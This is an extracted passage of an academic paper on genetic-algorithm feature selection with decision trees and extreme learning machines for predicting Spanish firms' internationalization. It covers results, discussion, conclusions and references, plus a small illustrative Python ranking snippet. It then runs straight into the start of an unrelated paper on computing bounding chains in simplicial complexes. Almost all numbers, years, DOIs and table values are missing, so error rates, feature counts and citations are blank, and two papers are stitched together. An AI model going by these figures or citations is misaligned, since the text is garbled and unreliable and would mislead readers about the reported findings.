been implemented and run on matlab software. for the elms the original matlab implementation (extreme learning machines, ) has been adapted to the fs framework. 
results and discussion

as previously explained, a standard ga has been applied to optimize the search for the best feature subsets. its most usual parameters were tuned in different combinations, taking the following values:
• population size: , , .
• number of generations: , , .
• mutation probability: . , . , . .
• crossover probability: . , . , . .
• selection scheme: tournament.

to get more reliable results, the same combination of values for the parameters above has been used to run the genetic algorithm a number of times (iterations). as stated in "materials and methods", the misclassification rate of the classifier has been used as the fitness function to select the best solutions (subsets of features). according to the values of that function, in each experiment the feature subset with the lowest error rate has been selected. results are shown in this section for the two classifiers that are applied for the first time (bdt and elm), as well as for the two previous ones, svm and rf (jiménez & herrero, ), to ease comparison. the ga parameter values and the misclassification rate (error) of the best individuals for each one of the classifiers are shown in the table below. additionally, for bdts, trees were built in each iteration, and in the case of elms both sigmoidal and sinusoidal functions have been benchmarked as activation functions of the hidden nodes. a varying number of such nodes has been tested as well for each experiment, including , , , , , , and units.

table (parameter values of the ga and misclassification rate associated to the best individual for each classifier): rows are population size, number of generations, mutation probability, crossover probability, and misclassification rate; columns are svm, rf, bdt, and elm.

in the case of bdts, the best individual (misclassification rate of . ) comprises the following features: "vicarious experience same sector", "manufacturing", "food", "construction", "unrelated diversification", and "number of countries". in the case of elms, the best individual (misclassification rate of . ) can be considered very robust, as it was the best one obtained with both sigmoidal (elm—sig) and sinusoidal (elm—sin) output functions and a high number of output neurons ( and respectively). the one obtained with the sigmoidal function comprises the following features: "vicarious experience same sector", "manufacturing", "food", "construction", "regulated", "financial", "employees", "unrelated diversification", and "number of countries". in the case of the sinusoidal function (elm—sin), the following features define the best individual: "vicarious experience same sector", "manufacturing", "food", "construction", "regulated", "financial", "psychic distance—language", "roe", and "number of countries". the best individuals obtained by bdt and elm share the following features: "vicarious experience same sector", "manufacturing", "food", "construction", "financial", and "number of countries". when considering all the classifiers, the following features are included in all the best individuals: "manufacturing", "food", and "number of countries". on the contrary, "psychic distance—education" and "unemployment" have not been included in any of the best individuals.
the number of features in the best individuals obtained in the different searches, and the average number of features in the best individuals obtained in all the ( ) iterations for the same parameters, are shown in the table below. for further study of the obtained results on advanced feature selection, the figure below shows a boxplot comprising the following information related to the iterations with the combination of parameter values that generated the best individual in each case: mean error, standard deviation of the error, error of the best individual, and number of features.

table (number of features in the best individuals for the different classifiers): for each classifier (svm, rf, bdt, elm), the number of features in the best individual and the mean number of features are reported.

from the enterprise management perspective, these results demonstrate the critical importance of vicarious experience, sector, and degree of internationalization as measured by the number of countries where the mne runs operations. product diversification, number of employees, and some dimensions of psychic distance are also relevant, as they appear in multiple best individuals. however, the results also underline that it is important to disentangle these constructs into their different components, as not all of them are equally important. thus, the results show that the most critical variable is vicarious experience from other firms in the same sector, but not the one from firms in different sectors. this idea is in line with those of jiang, holburn & beamish ( ), where it was shown that firms find vicarious experience from other firms in the same sector much more relevant, valuable, and easier to assimilate. in contrast, vicarious experience from firms in other sectors, while potentially useful (jiménez & de la fuente, ), is much less applicable, as managers will find it more difficult to assimilate and legitimize in front of other stakeholders (guillén, ). similarly, only unrelated diversification appears as relevant, but not related diversification. further, it is worth noting that only one dimension of psychic distance (i.e., in language) appears as relevant. among the multiple dimensions, our findings emphasize the importance of communication and the prevention of misunderstandings with other agents in the markets such as customers, suppliers or governments. this result is consistent with recent studies emphasizing the importance of language distance in international business (dow, cuypers & ertug, ; jimenez, holmqvist & jimenez, ). although the relative lack of relevance of several psychic distance stimuli is somewhat surprising given the amount of studies showing that great psychic distance is detrimental to firms, it is possible that these negative effects are offset by potential positive ones. some authors have reported that firms devote more resources to research and planning when psychic distance is greater (evans & mavondo, ), whereas when the countries are similar, firms might be complacent and overestimate the similarities, leading to the so-called "psychic distance paradox" (o'grady & lane, ; magnusson, schuster & taras, ).
in fact, various authors consider that firms might take advantage of greater distance as a source of talent and/or knowledge not available in closer markets (nachum, zaheer & gross, ) or opportunities for arbitrage, complementarity and creative diversity (pankaj, ; ghemawat, ; shenkar, luo & yeheskel, ; zaheer, schomaker & nachum, ; taras et al., ).

figure: boxplots of outputs from the iterations on bdt, elm—sig, and elm—sin that have obtained the best results: (a) number of features (in magenta) and (b) average error (in red), standard deviation of the error (in green), and error of the best individual (in blue).

overall, the results clearly depict a complex and multi-dimensional reality in which constructs that are frequently mentioned as determinants of internationalization (experience, distance, and diversification) are indeed complex constructs made of multiple layers that need to be disentangled and analyzed separately to fully understand the impact of each component (dow & karunaratna, ; jiménez et al., ; berry, guillén & zhou, ; pankaj, ). further, the results of the various classifiers consistently point to the critical role of the resources accumulated by the mne, both in terms of employees and in terms of its own experience in multiple international markets. finally, these results reinforce the utility of machine learning approaches as a complementary tool for researchers, as they permit the identification of patterns in an abductive and inductive way that other variables employed for deductive causal inference could overlook (choudhury, allen & endres, ; choudhury et al., ). the main target of the present research has been to reduce the number of features to look for when taking internationalization decisions. it can be easily checked that this objective has been achieved when looking at the number of features comprised in the best individuals. it is worth mentioning the case of bdts, where only out of the original features (a reduction of %) were selected while the misclassification rate is the second lowest. in the case of elms, the number has been reduced up to , obtaining the best classification error. something similar can be said when analyzing the average number of features, which is significantly lower than the number of features in the original dataset. the lowest average value ( . ) is obtained when applying elms and hence for the lowest classification error. when looking at the deviation of the number of features for the best individuals in the iterations (panel (a) of the figure above), it can be said that the mean and the median are quite close in the case of the elm results, with a significantly small deviation in the case of elms with the sinusoidal function (elm—sin). in the case of bdts, values vary greatly (from to ). regarding the average error (in red in panel (b)) of the whole population in the last generation, elms have obtained lower values than bdts. more precisely, the lowest value of all the iterations ( . ) has been obtained by elm—sig (identified as an outlier in the boxplot). additionally, the values obtained by elms are very compact (low standard deviation). the same can be said about the error of the best individuals (in blue in panel (b)). finally, when analyzing the standard deviation of the error (in green in panel
(b)), it can be concluded that the highest value (identified as an outlier in the boxplot) has been obtained by the bdt, while the lowest ones have been obtained by elm—sig. each one of the features in the original set has been analyzed from an individual standpoint for a more comprehensive study. the table below shows the percentage of best solutions that include each one of the original features, for the different classifiers in all the iterations. additionally, the sum of percentages has also been calculated, and features are ranked in decreasing order according to it.

table (inclusion percentage of original features in the best individuals for all the iterations with the different classifiers): for each feature, the inclusion percentage is given for svm, rf, bdt, and elm, together with the sum over bdt+elm and the total sum; ranked in decreasing order of total inclusion, the features are: number of countries; vicarious experience same sector; manufacturing; employees; unrelated diversification; food; construction; related diversification; roe; geographic distance (log); psychic distance—education; psychic distance—language; regulated; gdp growth; stock market; financial; vicarious experience; vicarious experience different sector; fdi/gdp; psychic distance—religion; unemployment; psychic distance—democracy; population (log); psychic distance—industrial development; psychic distance—social system.

the key features (those with the highest inclusion percentage) can be selected from this table. according to it, the most important features (accumulated inclusion rates above a certain threshold) are, in decreasing order of importance: "number of countries", "vicarious experience same sector", and "manufacturing". these are also the features with the highest inclusion rate in the case of bdts and elms (sum bdt+elm in the table). more precisely, "number of countries" can be considered the top feature, as it is the one with the highest inclusion rate and was included in all the best individuals obtained by svms, bdts, and elms. from the table, the least important features (lowest inclusion percentage) can also be identified. they include "psychic distance—democracy", "population (log)", "psychic distance—industrial development", and "psychic distance—social system", which have obtained the lowest accumulated inclusion rates. these most and least important features reinforce the ideas discussed above in terms of the relevance of the resources accumulated by the firm in terms of manpower and previous experience in multiple international markets. also in line with the previous findings, vicarious experience from firms in the same sector and the specific industry to which the mne belongs (notably in the case of manufacturing) manifest themselves as critical determinants. in contrast, other sources of vicarious experience, such as the one from firms in other sectors or the combination of vicarious experience from the same and different sectors, have a much less important role. as such, the results align more with those found by jiang, holburn & beamish ( ) than with jiménez & de la fuente ( ). the results also underline the fact that psychic distance does not appear as a critical determinant, and only the dimensions of education and language are moderately relevant.
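as a side note on reproducibility, the inclusion percentages behind this ranking are straightforward to compute from the binary masks of the best individuals returned by the repeated searches. the snippet below is an illustrative python sketch (not part of the original matlab pipeline); the feature names and masks in the toy example are made up.

```python
# sketch: rank features by how often they appear in the best individuals (one binary
# mask per run), mirroring the inclusion-percentage table above.
import numpy as np

def inclusion_ranking(best_masks, feature_names):
    masks = np.asarray(best_masks)             # shape: (n_runs, n_features)
    pct = 100.0 * masks.mean(axis=0)           # % of runs that include each feature
    order = np.argsort(-pct)                   # decreasing inclusion rate
    return [(feature_names[i], pct[i]) for i in order]

# toy example with three runs and four features
names = ["number of countries", "manufacturing", "roe", "unemployment"]
runs = [[1, 1, 0, 0], [1, 0, 1, 0], [1, 1, 0, 0]]
for name, p in inclusion_ranking(runs, names):
    print(f"{name}: {p:.0f}%")
```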
as in the previous case, these results therefore underline the relevance of language distance in international business (dow, cuypers & ertug, ; jimenez, holmqvist & jimenez, ), and point to the potential confounding effect of the positive and negative effects of distance in the rest of the dimensions (pankaj, ; ghemawat, ; shenkar, luo & yeheskel, ; zaheer, schomaker & nachum, ; taras et al., ). these results (bdts and elms) can be compared with the previous ones obtained by svms and rfs, and they are consistent. however, they differ in the case of the features "employees" and "manufacturing". the first one obtained the highest inclusion rate when combining svms and rfs, while it is the fifth one when considering bdts and elms. similarly, "manufacturing" has obtained the second highest inclusion rate when combining bdts and elms, whereas it was identified as the fifth most important one when considering svms and rfs. on the other hand, when comparing the least important features, "psychic distance—social system" and "psychic distance—industrial development" were identified by svms and rfs, whereas "psychic distance—democracy", "fdi/gdp", and "unemployment" have been identified by bdts and elms. from this comparison of classifier results, it can be observed that, while all the learning models emphasize the importance of firm-level determinants over country-level ones, svms and rfs find the size of the mne, as measured by the number of employees, to be more relevant, whereas for bdts and elms it has a more modest role and, in contrast, the influence of the industry to which the mne belongs is more prevalent. regarding the least important features, all the classifiers identify country-level characteristics, such as various dimensions of psychic distance and some macroeconomic figures related to the economy's international openness and the labor market.

conclusions

in this paper we aim to employ sophisticated ai techniques to explore the various possible configurations of variables that may have a critical impact on internationalization, in order to overcome limitations related to bounded rationality (barnard & simon, ) and provide insightful information relevant for managers and policy-makers. from the previously presented results, it can be concluded that advanced fs can be successfully applied in order to identify the most and least relevant features concerning the internationalization strategy of enterprises. more precisely, the elm has proved to be the wrapper learning model able to obtain the lowest error when predicting the internationalization decision on the dataset under study. the results obtained in this research clearly show that firm-level characteristics are more relevant than country-level ones. perhaps more importantly, the findings underline that constructs such as experience, product diversification or (psychic) distance are indeed complex and multi-dimensional, and that not all their components have the same importance. it is therefore necessary that future works take this complexity into consideration and that researchers refrain from employing aggregated measures of these constructs and, instead, test the individual effects of each component or dimension.
overall, the results in fact are consistent with previous works and with the state of the art, but also serve to provide empirical evidence that can contribute to unresolved debates in the literature (i.e., regarding the type of vicarious experience or dimension of psychic distance with the utmost importance). in this sense, we concur with recent research (choudhury et al., ; choudhury, allen & endres, ) highlighting the complementarities between machine learning techniques and other traditional tools, as the former permit identifying patterns from an abductive and an inductive way that deductive approaches such as classic regression, due to their constraints to fit models, sometimes overlook. we acknowledge that our paper is subject to some limitations, which open up interesting opportunities for further research. first, we are unable to include additional variables that could be relevant, such as the percentage of exports or the exact year the company started international operations, due to data unavailability in the data sources we were able to access on spanish mnes. besides, a transnational study is planned as future work, comprising data from additional countries. additionally, some other classifiers and combinations of them will be applied, trying to get and even lower misclassification rate. acknowledgements the work was conducted during the research stays of Álvaro herrero and roberto alcalde at kedge business school in bordeaux (france) additional information and declarations funding the authors received no funding for this work. competing interests the authors declare that they have no competing interests. author contributions � Álvaro herrero conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ � alfredo jiménez conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � roberto alcalde conceived and designed the experiments, performed the experiments, analyzed the data, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: raw data and code are available in the supplemental files. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ambos b, leicht-deobald u, leinemann a. . understanding the formation of psychic distance perceptions: are country-level or individual-level factors more important? international business review ( ): – doi . /j.ibusrev. . . . argote l, beckman sl, epple d. . the persistence and transfer of learning in industrial settings. management science ( ): – doi . /mnsc. . . . azar g, drogendijk r. . psychic distance, innovation, and firm performance. management international review ( ): – doi . /s - - - . barkema hg, bell jh, pennings jm. . foreign entry, cultural barriers, and learning. strategic management journal : – doi . /(sici) - ( ) : < ::aid-smj > . .co; -z. barnard c, simon ha. . administrative behavior: a study of decision-making processes in administrative organization. new york: free press. 
berry h, guillén mf, zhou n. . an institutional approach to cross-national distance. journal of international business studies ( ): – doi . /jibs. . . bhowmick s. . how psychic distance and opportunity perceptions affect entrepreneurial firm internationalization. canadian journal of administrative sciences/revue canadienne des sciences de l’administration ( ): – doi . /cjas. . blomkvist k, drogendijk r. . the impact of psychic distance on chinese outward foreign direct investments. management international review ( ): – doi . /s - - -y. brewer p. . operationalizing psychic distance: a revised approach. journal of international marketing ( ): – doi . /jimk. . . . centre d’Études prospectives et d’informations internationales (cepii). . cepii homepage. available at http://www.cepii.fr (accessed december ). chiesa m, maioli g, colombo gi, piacentini l. . gars: genetic algorithm for the identification of a robust subset of features in high-dimensional datasets. bmc bioinformatics ( ): doi . /s - - - . chikhouni a, edwards g, farashahi m. . psychic distance and ownership in acquisitions: direction matters. journal of international management ( ): – doi . /j.intman. . . . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /mnsc. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /(sici) - ( ) : % c ::aid-smj % e . .co; -z http://dx.doi.org/ . /jibs. . http://dx.doi.org/ . /cjas. http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /jimk. . . http://www.cepii.fr http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.intman. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ choudhury p, allen rt, endres mg. . machine learning for pattern discovery in management research. strategic management journal ( ): – doi . /smj. . choudhury p, wang d, carlson na, khanna t. . machine learning approaches to facial and text analysis: discovering ceo oral communication styles. strategic management journal ( ): – doi . /smj. . chyzhyk d, savio a, graña m. . evolutionary elm wrapper feature selection for alzheimer’s disease cad on anatomical brain mri. neurocomputing (april): – doi . /j.neucom. . . . clarke je, tamaschke r, liesch pw. . international experience in international business research: a conceptualization and exploration of key themes. international journal of management reviews ( ): – doi . /j. - . . .x. clavel san emeterio m, fernández-ortiz r, arteaga-ortiz j, dorta-gonzález p. . measuring the gradualist approach to internationalization: empirical evidence from the wine sector. plos one ( ):e doi . /journal.pone. . contreras s, manzanedo mÁ, herrero Á. . a hybrid neural system to study the interplay between economic crisis and workplace accidents in spain. journal of universal computer science : – . cyert rm, march jg. . a behavioral theory of the firm. malden: blackwell. dikova d. . performance of foreign subsidiaries: does psychic distance matter? international business review ( ): – doi . /j.ibusrev. . . . dow d. . the research page for douglas dow: distance and diversity scales for international business research. available at http://dow.net.au/?page_id= (accessed december ). dow d, cuypers ir, ertug g. . the effects of within-country linguistic and religious diversity on foreign acquisitions. 
journal of international business studies ( ): – doi . /jibs. . . dow d, ferencikova s. . more than just national cultural distance: testing new distance scales on fdi in slovakia. international business review ( ): – doi . /j.ibusrev. . . . dow d, karunaratna a. . developing a multidimensional instrument to measure psychic distance stimuli. journal of international business studies ( ): – doi . /palgrave.jibs. . dow d, larimo j. . challenging the conceptualization and measurement of distance and international experience in entry mode choice research. journal of international marketing ( ): – doi . /jimk. . . . efron b, tibshirani rj. . an introduction to the bootstrap. boca raton: crc press. evans j, mavondo ft. . psychic distance and organizational performance: an empirical examination of international retailing operations. journal of international business studies ( ): – doi . /palgrave.jibs. . extreme learning machines. . basic elm algorithms. available at https://personal.ntu.edu.sg/ egbhuang/elm_codes.html (accessed december ). ghemawat p. . the forgotten strategy. harvard business review : – . goldberg de. . genetic algorithms in search, optimization, and machine learning. boston: addison-wesley. guillén mf. . structural inertia, imitation, and foreign expansion: south korean firms and business groups in china, – . academy of management journal : – . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /smj. http://dx.doi.org/ . /smj. http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /j.ibusrev. . . http://dow.net.au/?page_id= http://dx.doi.org/ . /jibs. . http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . /jimk. . . http://dx.doi.org/ . /palgrave.jibs. https://personal.ntu.edu.sg/egbhuang/elm_codes.html https://personal.ntu.edu.sg/egbhuang/elm_codes.html http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ herrero Á, jiménez a. . improving the management of industrial and environmental enterprises by means of soft computing. cybernetics and systems ( ): – doi . / . . . herrero Á, jiménez a, bayraktar s. . hybrid unsupervised exploratory plots: a case study of analysing foreign direct investment. complexity ( ): doi . / / . hofstede g, hofstede gj, minkov m. . cultures and organizations: software of the mind. new york: mcgraw-hill. hsu m, huang c. . decision support system for management decision in high-risk business environment. journal of testing and evaluation ( ): – doi . /jte . huang g-b, zhu q-y, siew ck. . extreme learning machine: theory and applications. neurocomputing ( – ): – doi . /j.neucom. . . . huber g. . organizational learning: the contributing processes and the literatures. organization science ( ): – doi . /orsc. . . . håkanson l, ambos b, schuster a, leicht-deobald u. . the psychology of psychic distance: antecedents of asymmetric perceptions. journal of world business ( ): – doi . /j.jwb. . . . icex spain import and investments. . network of economic and commercial spanish offices abroad. available at http://www.oficinascomerciales.es (accessed december ). jadhav s, he h, jenkins k. . information gain directed genetic algorithm wrapper feature selection for credit rating. applied soft computing : – doi . /j.asoc. . . . jiang gf, holburn glf, beamish pw. . the impact of vicarious experience on foreign location strategy. journal of international management ( ): – doi . /j.intman. . . . 
jiang f, sui y, cao c. . an incremental decision tree algorithm based on rough sets and its application in intrusion detection. artificial intelligence review ( ): – doi . /s - - -z. jimenez a, holmqvist j, jimenez d. . cross-border communication and private participation projects: the role of genealogical language distance. management international review ( ): – doi . /s - - -y. jiménez a. . does political risk affect the scope of the expansion abroad? evidence from spanish mnes. international business review ( ): – doi . /j.ibusrev. . . . jiménez a, benito-osorio d, puck j, klopf p. . the multi-faceted role of experience dealing with policy risk: the impact of intensity and diversity of experiences. international business review ( ): – doi . /j.ibusrev. . . . jiménez a, de la fuente d. . learning from others: the impact of vicarious experience on the psychic distance and fdi relationship. management international review : – . jiménez a, herrero Á. . selecting features that drive internationalization of spanish firms. cybernetics and systems ( ): – doi . / . . . johanson j, vahlne j-e. . the internationalization process of the firm: a model of knowledge development and increasing foreign market commitments. journal of international business studies ( ): – doi . /palgrave.jibs. . johanson j, vahlne je. . the mechanism of internationalisation. international marketing review ( ): doi . / . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / . . http://dx.doi.org/ . / / http://dx.doi.org/ . /jte http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /orsc. . . http://dx.doi.org/ . /j.jwb. . . http://www.oficinascomerciales.es http://dx.doi.org/ . /j.asoc. . . http://dx.doi.org/ . /j.intman. . . http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ johanson j, vahlne j-e. . the uppsala internationalization process model revisited: from liability of foreignness to liability of outsidership. journal of international business studies ( ): – doi . /jibs. . . johanson j, wiedersheim-paul f. . the internationalization of the firm: four swedish cases. journal of management studies ( ): – doi . /j. - . .tb .x. john gh, kohavi r, pfleger k. . irrelevant features and the subset selection problem. in: th international conference on machine learning, morgan kauffman, – . klein s, roth vj. . determinants of export channel structure: the effects of experience and psychic distance reconsidered. international marketing review ( ): – . kleinert j, toubal f. . gravity for fdi. review of international economics ( ): – doi . /j. - . . .x. kogut b, singh h. . the effect of national culture on the choice of entry mode. journal of international business studies ( ): – doi . /palgrave.jibs. . kohavi r, john gh. . wrappers for feature subset selection. artificial intelligence ( – ): – doi . /s - ( ) -x. kramer o. . genetic algorithm essentials. cham: springer international publishing. kumar ms. . the relationship between product and international diversification: the effects of short-run constraints and endogeneity. strategic management journal ( ): – doi . /smj. . levitt b, march jg. . organizational learning. annual review of sociology ( ): – doi . /annurev.so. . . . lieberman mb, asaba s. . why do firms imitate each other? 
academy of management review : – . magnani g, zucchella a, floriani de. . the logic behind foreign market selection: objective distance dimensions vs. strategic objectives and psychic distance. international business review ( ): – doi . /j.ibusrev. . . . magnusson p, schuster a, taras v. . a process-based explanation of the psychic distance paradox: evidence from global virtual teams. management international review ( ): – doi . /s - - - . maleki n, zeinali y, niaki sta. . a k-nn method for lung cancer prognosis with the use of a genetic algorithm for feature selection. expert systems with applications ( ): doi . /j.eswa. . . meng-yao z, rui-hua y, su-fang z, jun-hai z. . feature selection based on extreme learning machine. in: international conference on machine learning and cybernetics, – . meyer ke, nguyen hv. . foreign investment strategies and sub-national institutions in emerging markets: evidence from vietnam. journal of management studies ( ): – doi . /j. - . . .x. nachum l, zaheer s, gross s. . does it matter where countries are? proximity to knowledge, markets and resources, and mne location choices. management science ( ): – doi . /mnsc. . . nordman er, tolstoy d. . does relationship psychic distance matter for the learning processes of internationalizing smes? international business review ( ): – doi . /j.ibusrev. . . . nordstrom ka, vahlne je. . the internationalization process of the firm: searching for new patterns and explanations. stockholm: institute of international business. herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /jibs. . http://dx.doi.org/ . /j. - . .tb .x http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . /s - ( ) -x http://dx.doi.org/ . /smj. http://dx.doi.org/ . /annurev.so. . . http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.eswa. . http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /mnsc. . http://dx.doi.org/ . /j.ibusrev. . . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ ojala a, tyrväinen p. . impact of psychic distance to the internationalization behavior of knowledge-intensive smes. european business review ( ): – doi . / . o’grady s, lane hw. . the psychic distance paradox. journal of international business studies ( ): – doi . /palgrave.jibs. . padmanabhan p, cho kr. . decision specific experience in foreign ownership and establishment strategies: evidence from japanese firms. journal of international business studies ( ): – doi . /palgrave.jibs. . pankaj g. . distance still matters: the hard reality of global expansion. harvard business review : – . panthong r, srivihok a. . wrapper feature subset selection for dimension reduction based on ensemble learning algorithm. procedia computer science : – doi . /j.procs. . . . puthusserry pn, child j, rodrigues sb. . psychic distance, its business impact and modes of coping: a study of british and indian partner smes. management international review ( ): – doi . /s - - - . ramanujam v, varadarajan p. . research on corporate diversification: a synthesis. strategic management journal ( ): – doi . /smj. . rustam z, yaurita f, segovia-vergas mj. . application of support vector machines in evaluating the internationalization success of companies. journal of physics: conference series : doi . / - / / / . saad a. . an overview of hybrid soft computing techniques for classifier design and feature selection. 
in: eighth international conference on hybrid intelligent systems, – . safavian sr, landgrebe d. . a survey of decision tree classifier methodology. ieee transactions on systems, man and cybernetics ( ): – doi . / . . salcedo-sanz s, camps-valls g, perez-cruz f, sepulveda-sanchis j, bousono-calzon c. . enhancing genetic feature selection through restricted search and walsh analysis. ieee transactions on systems, man, and cybernetics, part c ( ): – doi . /tsmcc. . . shenkar o, luo y, yeheskel o. . from “distance” to “friction”: substituting metaphors and redirecting intercultural research. academy of management review ( ): – doi . /amr. . . siedlecki w, sklansky j. . a note on genetic algorithms for large-scale feature selection. pattern recognition letters ( ): – doi . / - ( ) - . simić d, svirčević v, ilin v, simić sd, simić s. . particle swarm optimization and pure adaptive search in finish goods’ inventory management. cybernetics and systems ( ): – doi . / . . . sreerama km. . automatic construction of decision trees from data: a multi-disciplinary survey. data mining and knowledge discovery ( ): – doi . /a: . taras v, baack d, caprar d, dow d, froese f, jimenez a, magnusson p. . diverse effects of diversity: disaggregating effects of diversity in global virtual teams. journal of international management ( ): doi . /j.intman. . . terlaak a, gong y. . vicarious learning and inferential accuracy in adoption processes. academy of management review ( ): – doi . /amr. . . herrero et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . /palgrave.jibs. http://dx.doi.org/ . /j.procs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /smj. http://dx.doi.org/ . / - / / / http://dx.doi.org/ . / . http://dx.doi.org/ . /tsmcc. . http://dx.doi.org/ . /amr. . http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / . . http://dx.doi.org/ . /a: http://dx.doi.org/ . /j.intman. . http://dx.doi.org/ . /amr. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ termenon m, graña m, barrós-loscertales a, Ávila c. . extreme learning machines for feature selection and classification of cocaine dependent patients on structural mri data. neural processing letters ( ): – doi . /s - - -x. tinbergen j, hekscher a. . shaping the world economy: suggestions for an international economic policy. new york: twentieth century fund. tung rl, verbeke a. . beyond hofstede and globe: improving the quality of cross-cultural research. journal of international business studies ( ): – doi . /jibs. . . vahlne j-e. . the uppsala model on evolution of the multinational business enterprise—from internalization to coordination of networks. international marketing review ( ): – doi . / . vahlne j-e, bhatti wa. . relationship development: a micro-foundation for the internationalization process of the multinational business enterprise. management international review ( ): – doi . /s - - -z. vahlne j-e, johanson j. . from internationalization to evolution: the uppsala model at years. journal of international business studies ( ): – doi . /s - - - . vahlne j-e, nordström ka. . is the globe shrinking? psychic distance and the establishment of swedish sales subsidiaries during the last years. stockholm: institute of international business. wang y-y, zhang h, qiu c-h, xia s-r. . a novel feature selection method based on extreme learning machine and fractional-order darwinian pso. computational intelligence and neuroscience : – doi . / / . 
xue x, yao m, wu z. . a novel ensemble-based wrapper method for feature selection using extreme learning machine and genetic algorithm. knowledge and information systems ( ): – doi . /s - - - . yildiz he, fey cf. . are the extent and effect of psychic distance perceptions symmetrical in cross-border m&as? evidence from a two-country study. journal of international business studies ( ): – doi . /jibs. . . zaheer s, schomaker ms, nachum l. . distance without direction: restoring credibility to a much-loved construct. journal of international business studies ( ): – doi . /jibs. . .
submitted august accepted april published may corresponding author j. frederico carvalho, jfpbdc@kth.se academic editor mark wilson additional information and declarations can be found on page doi . /peerj-cs. copyright carvalho et al. distributed under creative commons cc-by . open access

an algorithm for calculating top-dimensional bounding chains

j. frederico carvalho, mikael vejdemo-johansson, danica kragic and florian t. pokorny
cas/rpl, kth, royal institute of technology, stockholm, sweden
mathematics department, city university of new york, college of staten island, new york, ny, united states of america

abstract

we describe the coefficient-flow algorithm for calculating the bounding chain of an (n−1)-boundary on an n-manifold-like simplicial complex s. we prove its correctness and show that it has a computational time complexity of o(|s^(n−1)|) (where s^(n−1) is the set of (n−1)-faces of s). we estimate the big-o coefficient, which depends on the dimension of s and the implementation. we present an implementation, experimentally evaluate the complexity of our algorithm, and compare its performance with that of solving the underlying linear system.

subjects algorithms and analysis of algorithms, data science, scientific computing and simulation
keywords homology, computational algebraic topology

introduction

topological spaces are by and large characterized by the cycles in them (i.e., closed paths and their higher dimensional analogues) and the ways in which they can or cannot be deformed into each other. this idea had been recognized by poincaré from the beginning of the study of topology. consequently, much of the study of topological spaces has been dedicated to understanding cycles, and these are the key features studied by the topological data analysis community (edelsbrunner & harer, ). one key part of topological data analysis methods is to distinguish between different cycles; more precisely, to characterize different cycles according to their homology class. this can be done efficiently using cohomology (pokorny, hawasly & ramamoorthy, ; edelsbrunner, letscher & zomorodian, ). however, such methods only distinguish between non-homologous cycles, and do not quantify the difference between cycles. a possible way to quantify this difference is to solve the problem of finding the chain whose boundary is the union of the two cycles in question, as was proposed in chambers & vejdemo-johansson ( ) by solving the underlying linear system, where the authors also take the question of optimality into account (with regards to the size of the resulting chain).
this line of research elaborates on dey, hirani & krishnamoorthy ( ), where the authors considered the problem of finding an optimal chain in the same homology class as a given chain. more recently, in rodríguez et al. ( ) the authors have taken a similar approach to ours, using a combinatorial method to compute bounding chains of -cycles on -dimensional simplicial complexes. how to cite this article carvalho et al. ( ), an algorithm for calculating top-dimensional bounding chains. peerj comput. sci. :e ; doi . /peerj-cs.

in this paper, we explore the geometric properties of simplicial n-manifolds to provide an algorithm that is able to calculate a chain whose boundary is some prescribed (n−1)-dimensional cycle, and we show that the proposed algorithm has a complexity which is linear in the number of (n−1)-faces of the complex. this is substantially faster than calculating a solution to the linear system as considered in chambers & vejdemo-johansson ( ), for which the complexity would be at least quadratic in the number of n-dimensional faces (golub & van loan, ).

background

in what follows we make extensive use of sequences; therefore, for any n ∈ ℕ, we abbreviate x_0, ..., x_n to x_{0:n}.

simplicial complexes

given a set of points p ⊆ ℝ^n, we define a k-dimensional simplex, or k-simplex, on points of p as the ordered set [p_{0:k}], where p_{0:k} ∈ p are k+1 affinely independent points called the vertices of [p_{0:k}]. we represent the simplex [p_{0:k}] by the convex hull of the points p_{0:k}, and we say that two simplices are the same if they have the same points and the orderings of the points differ only by an even permutation. if the orderings differ by an odd permutation, we say they have opposite orientations. since the convex hull of a finite set of points is a bounded closed set, it carries the notion of a boundary ∂[p_{0:k}], which is defined as:

